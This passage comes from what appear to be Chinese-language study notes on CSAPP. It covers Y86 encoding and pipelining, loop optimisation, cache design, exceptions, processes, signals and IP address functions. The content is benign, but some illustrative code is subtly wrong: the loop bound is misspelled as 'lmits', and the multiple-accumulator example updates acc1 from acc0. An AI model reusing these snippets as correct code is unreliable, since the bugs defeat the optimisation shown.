  cmove  [23]</span><br></pre></td></tr></table></figure><p>以上面的例子为例，<code>rrmovq</code>指令与条件传送有同样的指令代码，可以把它看作是一个“无条件传送”。</p></li><li><p>指令的长度与指令功能相关，有些需要操作数的指令编码就更长一点。</p><ul><li>可能有附加的<em>寄存器指示符字节</em>(register specifier byte)，用于指定1~2个寄存器。</li><li>有些指令需要一个附加的<em>常数 字</em>(constant word)。这个立即数成为指令的某个操作数.<blockquote><p>例如<code>irmovq $1, %rax</code>。<br><img src="/2020/07/csapp/chapters4_y86_isa.png" alt="img"></p></blockquote></li></ul></li></ul><h3 id="3-异常">3) 异常</h3><ul><li>在现代处理器中，当某些代码发生了某种类型的<strong>异常</strong>(exception)，此时处理器会执行异常处理程序。如果程序员没有手动设置异常处理程序，则CPU会执行默认的处理程序。<blockquote><p>大多数情况下默认的处理程序只会简单的关闭程序。</p></blockquote></li></ul><h3 id="4-SEQ阶段">4) SEQ阶段</h3><p><img src="/2020/07/csapp/chapters4_y86_graph.png" alt="img"></p><blockquote><p>详细细节请翻阅CSAPP第三版第277页，这里只是简单概述</p></blockquote><ul><li>取指阶段<ul><li>以PC作为第一个字节的地址，指令内存硬件单元会一次从内存中读出10个字节。并将第一个字节分割成两个4位的数，用于计算指令和功能码。</li><li>PC增加硬件单元会根据当前PC以及CPU内的信号来生成下一条指令的PC。<br>$new PC = old PC + 1 + r + 8i$（$r$为当前指令是否需要寄存器指示字节，$i$为需要的常数字节数）<blockquote><p>注意，此时只是计算，还没有设置下一条的PC<br><img src="/2020/07/csapp/chapters4_y86_fetch.png" alt="img"></p></blockquote></li></ul></li><li>译码和写回阶段<ul><li>寄存器文件有两个读端口A和B，从这两个端口同时读取寄存器值valA和valB<br><img src="/2020/07/csapp/chapters4_y86_translate.png" alt="img"></li></ul></li><li>执行阶段<ul><li>执行阶段包括ALU，该单元更具<code>alufun</code>信号的设置，对输入的<code>aluA</code>、<code>aluB</code>执行特定操作。</li><li>指令阶段还包括条件码寄存器。每次运行时，ALU都会产生三个与条件码相关的信号——零、符号、溢出。</li><li>标号为<code>cond</code>的硬件单元会根据条件码和功能码来确定是否进行条件分支或条件数据传送。<br><img src="/2020/07/csapp/chapters4_y86_exec.png" alt="img"></li></ul></li><li>访存阶段<ul><li>该阶段的任务为读写程序数据。读写的对象除了主存以外，还包括寄存器文件<br><img src="/2020/07/csapp/chapters4_y86_visitM.png" alt="img"></li></ul></li><li>更新PC阶段<ul><li>根据指令的类型以及是否选择分支来设置新的PC。如果没有跳转，则使用取指阶段计算出的新PC值。<br><img src="/2020/07/csapp/chapters4_y86_updatePC.png" alt="img"></li></ul></li></ul><h3 id="5-流水线">5) 流水线</h3><h4 id="a-流水线冒险">a. 流水线冒险</h4><ul><li><p>将流水线技术引入一个待反馈的系统，当相邻指令间存在相关时会导致问题。</p><blockquote><p>这里的<em>相关</em>有两种形式：<br>1.数据相关。下一条指令会用到当前指令计算出的结果。<br>2.控制相关。一条指令要确定下一条指令的位置。</p></blockquote><p>这些相关可能会导致流水线产生计算错误，称为冒险(hazard)。其中也分为<em>数据冒险</em>和<em>控制冒险</em>。</p></li><li><p>避免冒险的方式</p><ul><li>暂停(stalling)。暂停技术阻塞一组指令在它们所处的阶段，而允许其他指令继续通过流水线，直到冒险条件不再满足。其处理方法为：每次要阻塞一条指令在译码阶段，就在指令阶段插入一个气泡（bubble）。气泡类似nop指令，不会更改寄存器、内存、条件码与程序状态。<br><img src="/2020/07/csapp/chapters4_pipelin_bubble.png" alt="img"></li><li>转发(formarding)。将结果值直接从一个流水线阶段传到较早阶段的技术称为数据转发，也称旁路(bypassing)。<br><img src="/2020/07/csapp/chapters4_pipelin_forward.png" alt="img"></li></ul></li><li><p>为了提高CPU的运行速度，应尽量避免流水线冒险</p></li></ul><h2 id="五、-优化程序性能">五、 优化程序性能</h2><h3 id="1-代码移动">1) 代码移动</h3><p>将循环不变量从循环中提出。例如以下操作</p>  <figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 优化前</span></span><br><span class="line"><span class="keyword">for</span>(<span class="type">size_t</span> i = <span class="number">0</span>; i &lt; <span class="built_in">strlen</span>(str); i++)</span><br><span class="line">  Statements;</span><br><span class="line"><span class="comment">// 优化后</span></span><br><span class="line"><span class="type">size_t</span> str_len = <span class="built_in">strlen</span>(str);</span><br><span class="line"><span class="keyword">for</span>(<span class="type">size_t</span> i = <span class="number">0</span>; i &lt; str_len; i++)</span><br><span class="line">  Statements;</span><br></pre></td></tr></table></figure><p>上面的例子中，未优化版本在某些情况下，其时间复杂度可达到$O(N^2)$级别！改进后的时间复杂度只有$O(N)$。</p><h3 id="2-消除不必要的内存引用">2) 消除不必要的内存引用</h3><p>减少不必要的内存读/写以获得更高的执行速度。</p><h3 id="3-理解现代处理器">3) 理解现代处理器</h3><p>现代处理器使用流水线机制，同时搭配高速缓存内存以达到更高的速度。避免流水线暂停或cache中数据未命中，可以让CPU尽可能地发挥出全部性能。</p><h3 id="4-循环展开">4) 循环展开</h3><ul><li><p>循环展开是一种程序变换，通过增加每次迭代计算的元素数量，减少循环的迭代次数。</p></li><li><p>例子：</p>  <figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 循环展开前</span></span><br><span class="line"><span class="keyword">for</span>(<span class="type">int</span> i = <span class="number">0</span>; i &lt; lmits; i++)</span><br><span class="line">  acc0 = acc0 OP data[i];</span><br><span class="line"></span><br><span class="line"><span class="comment">// 循环展开后</span></span><br><span class="line"><span class="type">int</span> limits = length - n;</span><br><span class="line"><span class="type">int</span> i;</span><br><span class="line"><span class="keyword">for</span>(i = <span class="number">0</span>; i &lt; lmits; i += <span class="number">2</span>)</span><br><span class="line">&#123;</span><br><span class="line">  acc0 = acc0 OP data[i];</span><br><span class="line">  acc0 = acc0 OP data[i<span class="number">+1</span>];</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">for</span>(; i &lt; length; i ++)</span><br><span class="line">  acc0 = acc0 OP data[i];</span><br></pre></td></tr></table></figure></li></ul><h3 id="5-多个累计变量">5) 多个累计变量</h3><ul><li><p>对于一个可结合或可交换的合并运算，我们可以通过将一组合并运算分割成两个或更多的部分，并在最后合并结果来提高性能。</p></li><li><p>例子</p><blockquote><p>该例子还运用了循环展开技术。</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> limits = length - n;</span><br><span class="line"><span class="type">int</span> i;</span><br><span class="line"><span class="keyword">for</span>(i = <span class="number">0</span>; i &lt; lmits; i += <span class="number">2</span>)</span><br><span class="line">&#123;</span><br><span class="line">  acc0 = acc0 OP data[i];</span><br><span class="line">  acc1 = acc0 OP data[i<span class="number">+1</span>];</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">for</span>(; i &lt; length; i ++)</span><br><span class="line">  acc0 = acc0 OP data[i];</span><br><span class="line"><span class="type">int</span> total = acc0 + acc1;</span><br></pre></td></tr></table></figure></li></ul><h2 id="六、-存储器层次结构">六、 存储器层次结构</h2><h3 id="1-局部性">1) 局部性</h3><ul><li>一个编写良好的计算机程序常常具有良好的<em>局部性</em>(locality)。</li><li>程序倾向于引用邻近于其他最近引用过的数据项的数据项，或者最近引用过的数据项本身。这种倾向性，被称为<em>局部性原理</em>(principle of locality)。</li><li>局部性通常由两种不同的形式，分别为<em>时间局部性</em>和<em>空间局部性</em><ul><li>时间局部性：被引用过的一次的内存位置很可能在不远的将来被多次引用。</li><li>空间局部性：如果一个内存位置被引用了一次，那么程序很可能在不远处的将来引用附近的一个内存位置。</li></ul></li><li>有良好局部性的程序比局部性差的程序运行的更快。</li></ul><h3 id="2-高速缓存存储器">2) 高速缓存存储器</h3><ul><li>Cache是一种小容量高速缓冲存储器，它由SRAM组成，其直接制作在CPU芯片内，速度几乎与CPU一样快。</li><li>程序运行时，CPU使用的一部分数据/指令会预先成批拷贝在Cache中，当CPU需要从内存读/写数据或指令时，先检查Cache，若有，就直接从Cache中读取，而不用访问主存储器。</li><li>由于程序访问的局部性特征，大多数情况下CPU可以直接从这个高速缓存中取得指令和数据，不必再访问主存。这大大提高了访存速度。</li><li>Cache的通用组织<br><img src="/2020/07/csapp/chapter6_cache.png" alt="img"></li><li>有效位<ul><li>有效位为0时表示信息无效，为1表示信息有效</li><li>开机或复位时，所有高速缓存行的有效位V = 0</li><li>某行被替换后使其为1</li><li>某行被装入新快后使其为1</li><li>通过使V=0冲刷Cache（例如：进程切换）<blockquote><p>“Cache冲刷”指令为操作系统所使用，对操作系统程序员不是透明的。</p></blockquote></li></ul></li></ul><h4 id="a-直接映射高速缓存">a. 直接映射高速缓存</h4><ul><li>每个组只有一行的高速缓存称为<em>直接映射</em>高速缓存(direct-mapped cache)<br><img src="/2020/07/csapp/chapter6_directMap-cache.png" alt="img"></li><li>高速缓存请求数据的流程<ul><li>组选择：从主存地址中的特定偏移处抽取s个组索引，这些位被解释成一个对应的无符号整数高速缓存组号。<br><img src="/2020/07/csapp/chapter6_directMap-cache_group.png" alt="img"></li><li>行匹配：直接映射高速缓存中每组只有一个高速缓存行。如果当前行的有效位已经设置，并且标记(tag)匹配，则缓存命中。</li><li>字选择：根据后b位的块内偏移来获取所需的字<br><img src="/2020/07/csapp/chapter6_directMap-cache_line.png" alt="img"></li><li>行替换：如果缓存不命中，则需要从下一级存储层次结构中取出请求的块，并驱逐并替换高速缓存行。</li></ul></li><li>优点：唯一映射；命中时间小</li><li>缺点：缺失率高；关联度低</li></ul><h4 id="b-全相联高速缓存">b. 全相联高速缓存</h4><ul><li><em>全相联高速缓存</em>（fully associative cache）是由一个包含所有高速缓存行的组组成的。</li><li>全相联高速缓存的结构较为简单<br><img src="/2020/07/csapp/chapter6_fullMap-cache.png" alt="img"></li><li>全相联高速缓存中的行匹配和字选择与上述的类似，组只有一行所以默认只选择组0。<br><img src="/2020/07/csapp/chapter6_fullMap-cache_found.png" alt="img"></li><li>由于全相联高速缓存电路必须并行搜索许多相匹配的标记，构成一个又大又快的相联高速缓存十分困难，而且造价昂贵。因此全相联高速缓存只适合做小的高速缓存。<blockquote><p>例如虚拟内存系统中的翻译备用缓冲器，该部件用于缓存页表项。</p></blockquote></li></ul><h4 id="c-组相联高速缓存">c. 组相联高速缓存</h4><ul><li><em>组相联高速缓存</em>（set associative cache）是上述两种高速缓存的结合体。下图是它的结构<br><img src="/2020/07/csapp/chapter6_setMapCache.png" alt="img"></li><li>组相联高速缓存的组匹配<br><img src="/2020/07/csapp/chapter6_setMapCache_group.png" alt="img"></li><li>组相联高速缓存的行匹配与字选择<br><img src="/2020/07/csapp/chapter6_setMapCache_line.png" alt="img"></li><li>组相联高速缓存的不命中。<ul><li>当数据不命中时，需要替换该组中的某一行。其常用的替换算法有：<ul><li>随机替换算法（rand）</li><li>先进先出算法（FIFO）</li><li>最近最少用LRU（least-recently used）</li><li>最不经常用LFU（least-frequently used）</li></ul></li><li>以LRU算法为例。LRU是一种栈算法，它的命中率随组的增大而提高。<br>LRU具体实现时，通过给每个cache行设定一个计数器，根据计数值来记录主存块的使用情况。<blockquote><p>这个计数值称为<strong>LRU位</strong><br>当CPU访问了Cache时，每个Cache行的LRU位均递增。在下一次数据未命中时，操作系统通过比较特定组内的LRU位，选出最近最少用的Cache行，驱逐并重新加载数据。</p></blockquote></li></ul></li></ul><h4 id="d-写策略">d. 写策略</h4><ul><li>必须保持Cache中的数据和主存中数据一致，否则会出现Cache一致性问题。<blockquote><p>例如当多个设备都允许访问主存，或多个CPU都带有各自的Cache而共享主存时</p></blockquote></li><li>写操作有两种情况<ul><li>写命中（Write Hit）：要写的单元已经在Cache中<ul><li>直写（Write Through）: 同时写Cache和主存单元。（速度十分缓慢）</li><li>回写（Write Back）: 只写Cache不写主存，缺失时一次写回，每行有个修改位（dirty bit, 脏位），大大降低主存带宽要求，但控制可能很复杂。</li></ul></li><li>写不命中（Write Miss）: 要写的单元不在Cache中<ul><li>写分配（Write Allocate）<ul><li>将主存块装入Cache，然后更新相应单元。</li><li>试图利用空间局部性，但每次都要从主存中读入一个块。</li></ul></li><li>写不分配（Not Write Allocate）<ul><li>直接写主存单元，不把主存装入到Cache。</li></ul></li></ul></li></ul></li></ul><h3 id="3-编写高速缓存友好的代码">3) 编写高速缓存友好的代码</h3><ul><li><p>确保代码高速缓存友好的基本方法</p><ul><li>让最常见的情况运行的快</li><li>尽量减小每个循环内部的缓存不命中数量</li></ul></li><li><p>编写高速缓存友好的代码的重要问题</p><ul><li>对局部变量的反复引用是好的，因为编译器能将它们缓存在寄存器中（时间局部性）</li><li>步长为1的引用模式是好的，因为存储器层次结构中所有层次上的缓存都是将数据存储为连续的块（空间局部性）</li></ul></li><li><p>示例代码</p>  <figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;iostream&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;ctime&gt;</span></span></span><br><span class="line"><span class="keyword">using</span> <span class="keyword">namespace</span> std;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="type">const</span> <span class="type">int</span> m = <span class="number">10000</span>;</span><br><span class="line">  <span class="type">const</span> <span class="type">int</span> n = <span class="number">1000</span>;</span><br><span class="line">  <span class="type">const</span> <span class="type">int</span> testNum = <span class="number">1000</span>;</span><br><span class="line">  <span class="type">int</span> total = <span class="number">0</span>;</span><br><span class="line">  <span class="type">int</span>** nums = <span class="keyword">new</span> <span class="type">int</span>* [m];</span><br><span class="line">  <span class="keyword">for</span> (<span class="type">int</span> i = <span class="number">0</span>; i &lt; m; i++)</span><br><span class="line">  &#123;</span><br><span class="line">    nums[i] = <span class="keyword">new</span> <span class="type">int</span>[n];</span><br><span class="line">    <span class="keyword">for</span>(<span class="type">int</span> j = <span class="number">0</span>; j &lt; n; j++)</span><br><span class="line">      nums[i][j] = (i%<span class="number">10</span>) * (j%<span class="number">10</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="type">clock_t</span> t1 = <span class="built_in">clock</span>();</span><br><span class="line">  <span class="comment">// 高速缓存友好的代码</span></span><br><span class="line">  total = <span class="number">0</span>;</span><br><span class="line">  <span class="keyword">for</span> (<span class="type">int</span> a = <span class="number">0</span>; a &lt; testNum; a++)</span><br><span class="line">    <span class="comment">// 索引顺序为 i,j</span></span><br><span class="line">    <span class="keyword">for</span> (<span class="type">int</span> i = <span class="number">0</span>; i &lt; m; i++)</span><br><span class="line">      <span class="keyword">for</span> (<span class="type">int</span> j = <span class="number">0</span>; j &lt; n; j++)</span><br><span class="line">        total += nums[i][j];</span><br><span class="line"></span><br><span class="line">  <span class="type">clock_t</span> t2 = <span class="built_in">clock</span>();</span><br><span class="line">  <span class="comment">// 高速缓存不友好的代码</span></span><br><span class="line">  total = <span class="number">0</span>;</span><br><span class="line">  <span class="keyword">for</span> (<span class="type">int</span> a = <span class="number">0</span>; a &lt; testNum; a++)</span><br><span class="line">    <span class="comment">// 索引顺序为 j, i</span></span><br><span class="line">    <span class="keyword">for</span> (<span class="type">int</span> j = <span class="number">0</span>; j &lt; n; j++)</span><br><span class="line">      <span class="keyword">for</span> (<span class="type">int</span> i = <span class="number">0</span>; i &lt; m; i++)</span><br><span class="line">        total += nums[i][j];</span><br><span class="line"></span><br><span class="line">  <span class="type">clock_t</span> t3 = <span class="built_in">clock</span>();</span><br><span class="line">  cout &lt;&lt; <span class="string">&quot;t1: &quot;</span> &lt;&lt; t1 &lt;&lt; <span class="string">&quot; t2: &quot;</span> &lt;&lt; t2 &lt;&lt; <span class="string">&quot; t3: &quot;</span> &lt;&lt; t3 &lt;&lt; endl;</span><br><span class="line">  cout &lt;&lt; <span class="string">&quot;高速缓存  友好代码所需时间: &quot;</span> &lt;&lt; t2 - t1 &lt;&lt; endl;</span><br><span class="line">  cout &lt;&lt; <span class="string">&quot;高速缓存不友好代码所需时间: &quot;</span> &lt;&lt; t3 - t2 &lt;&lt; endl;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>程序输出<br><img src="/2020/07/csapp/cache_code.png" alt="img"><br>其速度差距在这段代码的输出上表现的淋漓尽致，差距十分明显。</p></li></ul><h2 id="七、-链接">七、 链接</h2><blockquote><p>暂略</p></blockquote><h2 id="八、异常控制流">八、异常控制流</h2><h3 id="1-异常">1) 异常</h3><ul><li><p>现代系统通过使控制流发生突变来对各种系统状态的变化做出反应，这种突变称为<strong>异常控制流</strong>(Exceptional Control Flow, ECF)。异常控制流发生在计算机系统的各个阶段，例如上下文切换、发送与接受信号，以及应用程序通过使用<em>陷阱</em>(trap)或<em>系统调用</em>(system call)的ECF形式，向操作系统请求服务。</p></li><li><p>在任何情况下，当CPU检测到<em>事件</em>发生时，它会通过一张叫做<em>异常表</em>(exception-table)的跳转表，跳转至处理特定异常的<em>异常处理程序</em>(exception handler)进行处理。</p></li><li><p>异常处理完成后，会发生以下三种情况中的一种</p><ul><li>控制流返回当前指令(即引起异常的指令，例如缺页异常)</li><li>控制流返回下一条指令</li><li>终止当前被中断的程序</li></ul></li><li><p>异常的类别</p><table><thead><tr><th style="text-align:left">类别</th><th style="text-align:left">原因</th><th style="text-align:center">异步/同步</th><th style="text-align:left">返回行为</th></tr></thead><tbody><tr><td style="text-align:left">中断(interrupt)</td><td style="text-align:left">来自I/O设备的信号</td><td style="text-align:center">异步</td><td style="text-align:left">总是返回到下一条指令</td></tr><tr><td style="text-align:left">陷阱(trap)</td><td style="text-align:left">有意的异常</td><td style="text-align:center">同步</td><td style="text-align:left">总是返回到下一条指令</td></tr><tr><td style="text-align:left">故障(fault)</td><td style="text-align:left">潜在可恢复的错误</td><td style="text-align:center">同步</td><td style="text-align:left">可能返回到当前指令</td></tr><tr><td style="text-align:left">终止(abort)</td><td style="text-align:left">不可恢复的错误</td><td style="text-align:center">同步</td><td style="text-align:left">不会返回</td></tr></tbody></table><ul><li>中断<ul><li>一些I/O设备或芯片通过向CPU上的某个引脚发送信号，并将异常号放至系统总线上来触发中断。</li><li>在当前指令执行完成后，CPU注意该引脚上的电压变为高电平，则获取异常号并调用中断处理程序，最后将控制流返回到下一条指令。</li></ul></li><li>陷阱<ul><li>陷阱是一种<em>有意</em>的异常，其最重要的用途是在用户程序与内核间提供一个<em>系统调用</em>接口。利用该接口可进行读/写文件，加载程序等等。</li><li>执行syscall指令会导致一个异常处理程序的陷阱，该程序会解析参数并调用适当的内核程序。</li></ul></li><li>故障<ul><li>故障由错误情况引起，它可能被故障处理程序所修正。</li><li>其中一个经典的故障示例是<strong>缺页异常</strong>。</li></ul></li><li>终止<ul><li>终止是不可恢复的致命错误造成的后果，通常是一些硬件错误。</li></ul></li></ul></li></ul><h3 id="2-进程">2) 进程</h3><ul><li><strong>进程</strong>(process)是<em>一个执行中程序的实例</em>。系统中的每个程序都运行在某个进程的<strong>上下文</strong>(context)</li><li>进程上下文由程序运行所需的状态组成，包括内存中的代码与数据、栈、寄存器内容、环境变量、文件描述符集合等等。</li><li>进程这个抽象类型提供了一种假象：程序独占CPU与内存。其中程序占用CPU的控制流称为逻辑流，注意与CPU的物理流不一样。</li><li>一个逻辑流的执行时间在时间上与另一个流重叠，称为<em>并发流</em>(concurrent flow)。<br>多个流并发执行的一般现象称为<em>并发</em>(concurrency)。<br>一个进程和其他进程轮流运行的概念称为<em>多任务</em>(multitasking)。<br>一个进程执行它的控制流的一部分的每一时间段叫做<em>时间片</em>(time slice).<br>如果两个流并发的运行在不同的处理器或计算机上，则这些流称为<em>并行流</em>(parallel flow)。它们<strong>并行运行，并发执行。</strong></li><li><strong>内核模式</strong><ul><li>一个运行在内核模式的进程可以执行指令集中的任何指令，并且可以访问系统中的任何内存位置。</li><li>与之相反的是，用户模式中的进程不允许执行<em>特权指令</em>(privileged instruction)，例如停止处理器，改变模式位，或清空cache等操作。同时也不允许直接访问内核区中的数据与代码，只能通过异常处理程序进入内核模式。</li></ul></li></ul><h3 id="3-进程控制">3) 进程控制</h3><ul><li>进程总是处于下面三种状态之一<ul><li><strong>运行</strong>。运行中的进程正在CPU上执行或等待被执行。</li><li><strong>停止</strong>。进程的执行被挂起(suspended)，并且不会被调度。<ul><li><code>SIGSTOP, SIGTSTP, SIGTTIN, SIGTTOU</code>信号会使一个运行中的进程停止</li><li><code>SIGCONT</code>信号会使一个暂停的程序再次开始执行。</li></ul></li><li><strong>终止</strong>。进程永远的停止了。进程终止的三个原因：<ul><li>收到某个信号，其中该信号的默认行为是终止当前进程。</li><li>从主程序返回</li><li>调用exit函数。</li></ul></li></ul></li><li>回收子进程<ul><li>当一个进程由于某种原因终止时，该进程会被内核保存在一种已终止的状态，直到它被父进程回收(reaped)。</li><li>当回收完成后，内核将子进程退出状态传递给父进程并抛弃已终止的进程。</li><li>其中，一个终止但尚未被回收的进程称为<em>僵尸进程</em>(zonbie)。</li><li>若父进程已经终止了，则该子进程称为<em>孤儿进程</em>，内核会安排init进程成为该子进程的父进程，并回收该僵尸进程。<blockquote><p>init进程的pid为1，它不会终止，是所有进程的祖先。</p></blockquote></li></ul></li><li>sleep函数会使当前进程休眠。需要注意的是，休眠的进程可能因为一个信号中断而提前返回。</li></ul><h3 id="4-信号">4) 信号</h3><ul><li>Linux<em>信号</em>(signal)是一种更高层的软件形式的异常。它允许进程和内核中断其他进程。</li><li>信号提供了一种机制，通知用户进程发生了这些异常。</li><li>以下是linux系统上支持的信号列表<br><img src="/2020/07/csapp/signals.png" alt="img"></li><li>传递一个信号到目的进程的步骤<ul><li>发送信号<ul><li>内核通过 更新目的进程上下文的某个状态，发送一个信号给目标进程</li></ul></li><li>接收信号<ul><li>进程可以忽略信号，终止或者通过执行信号处理程序来捕获这个信号。</li><li>每个信号类型都有一个预定义的默认行为。<ul><li>进程终止</li><li>进程终止并转储内存</li><li>进程停止(挂起)直到被SIGCONT信号重启</li><li>进程忽略该信号</li></ul></li></ul></li></ul></li><li>信号是不排队的。如果待接受信号里已经存在当前类型的信号，则当前信号会被丢弃。</li><li>使用信号时，需要考虑是否存在<strong>条件竞争</strong></li></ul><h3 id="5-非本地跳转">5) 非本地跳转</h3><ul><li>C语言提供了一种用户级异常控制流形式，称为<em>非本地跳转</em>(nonlocal jump)。它将程序直接从一个函数转移到另一个当前正在执行的函数，而不需要经过正常的调用——返回序列。</li><li>非本地跳转通过<code>setjmp</code>和<code>longjmp</code>函数来提供实现的<ul><li><code>setjmp</code>/<code>sigsetjmp</code><ul><li>setjmp函数会在env缓冲区中保存当前的<em>调用环境</em>，以供longjmp使用，同时返回0。</li><li>调用环境包括程序计数器，栈指针和通用目的寄存器等等</li><li>setjmp返回值无法赋值给变量</li></ul></li><li><code>longjmp</code>/<code>siglongjmp</code><ul><li>longjmp函数从env缓冲区中恢复调用环境，然后触发一个从最近一次初始化env的setjmp调用的返回。</li><li>然后setjmp返回，并带有非零的返回值retval。</li></ul></li></ul></li><li>重要应用<ul><li>一个重要应用就是允许从一个深层嵌套的函数调用中立即返回，通常是由检测到某个错误情况引起的。</li><li>C++和Java提供的异常机制是较高层次的，是C语言的setjmp和longjmp函数的更加结构化的版本。<br>可以简单的将try语句中的catch子句看作类似于setjmp函数；throw语句类似于longjmp函数。</li></ul></li></ul><h2 id="九-虚拟内存">九. 虚拟内存</h2><blockquote><p>虚拟内存部分暂时跳过，待学习操作系统时再回顾<br>动态内存分配部分，由于笔者曾经学习了glibc的ptmalloc机制（这部分笔记也在blog中），故该部分也暂且跳过。</p></blockquote><h2 id="十-系统级I-O">十. 系统级I/O</h2><blockquote><p>暂时跳过</p></blockquote><h2 id="十一-网络编程">十一. 网络编程</h2><h3 id="1-网络">1) 网络</h3><ul><li>互联网络至关重要的特性：它能由采用完全不同和不兼容计数的各种局域网和广域网组成。</li><li>如何让某台源主机跨过所有不兼容网络发送数据位到另一台目的主机？解决方法是<strong>一层运行在每台主机和路由器上的协议软件</strong>，它消除了不同网络之间的差异。该协议必须提供两种基本能力：<ul><li><strong>命名机制</strong>。互联网络协议通过定义一种一致的主机地址格式消除命名差异。每台主机会被分配至少一个这种<em>互联网络地址</em>(internet address), 该地址唯一标识了这台主机。</li><li><strong>传送机制</strong>。互联网协议通过定义一种把数据位捆扎成不连续的片（称为<em>包</em>）的统一方式，从而消除了传送差异。一个包是由<em>包头</em>和<em>有效载荷</em>组成的，其中包头包括包的大小以及源主机和目的主机的地址，有效载荷包括从源主机发出的数据位。</li></ul></li><li>互联网络思维的精髓：<strong>封装</strong></li></ul><h3 id="2-全球IP因特网">2) 全球IP因特网</h3><h4 id="1-IP地址">1. IP地址</h4><ul><li><p>一个IPv4地址是一个32位无符号整数。网络程序将IP地址存放在以下结构中</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* IP address structure */</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">in_addr</span>&#123;</span><br><span class="line">  <span class="type">uint32_t</span> s_addr; <span class="comment">/* Address in network byte order (Big-endian) */</span></span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure></li><li><p>因为因特网主机中可以有不同的主机字节序列，TCP/IP为任意整数数据项定义了一个统一的<em>网络字节顺序</em>(network byte order) —— <strong>大端字节顺序</strong>。</p></li><li><p>Unix提供以下函数在网络和主机字节顺序间实现转换。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;arpa/inet.h&gt;</span></span></span><br><span class="line"><span class="comment">// 返回按照网络字节顺序的值</span></span><br><span class="line"><span class="function"><span class="type">uint32_t</span> <span class="title">htonl</span><span class="params">(<span class="type">uint32_t</span> hostlong)</span></span>;</span><br><span class="line"><span class="function"><span class="type">uint16_t</span> <span class="title">htons</span><span class="params">(<span class="type">uint16_t</span> hostsort)</span></span>;</span><br><span class="line"><span class="comment">// 返回按照主机字节顺序的值</span></span><br><span class="line"><span class="function"><span class="type">uint32_t</span> <span class="title">ntohl</span><span class="params">(<span class="type">uint32_t</span> netlong)</span></span>;</span><br><span class="line"><span class="function"><span class="type">uint16_t</span> <span class="title">ntohs</span><span class="params">(<span class="type">uint16_t</span> netshort)</span></span>;</span><br></pre></td></tr></table></figure></li><li><p>IP地址通常是以一种称为<em>点分十进制表示法</em>来表示的。</p><blockquote><p>例如<code>128.2.194.242</code>就是地址<code>0x8002c2f2</code>的点分十进制表示。<br>应用程序使用以下函数实现IP地址和点分十进制串之间的转换。</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;arpa/inet.h&gt;</span></span></span><br><span class="line"><span class="comment">// 返回： 若成功则1，若src为非法点分十进制地址则为0，若出错则为-1</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">inet_pton</span><span class="params">(AF_INET, <span class="type">const</span> <span class="type">char</span>* src, <span class="type">void</span>* dst)</span></span>;</span><br><span class="line"><span class="comment">// 返回： 若成功则指向点分十进制字符串的指针，若出错则为NULL</span></span><br><span class="line"><span class="function"><span class="type">const</span> <span class="type">char</span>* <span class="title">inet_ntop</span><span class="params">(AF_INET, <span class="type">const</span> <span class="type">void</span>* src, <span class="type">char</span>*dst, <span class="type">socklen_t</span> size)</span></span>;</span><br></pre></td></tr></table></figure></li></ul><h4 id="2-因特网域名">2. 因特网域名</h4><ul><li>因特网定义了一组<em>域名</em>(domain 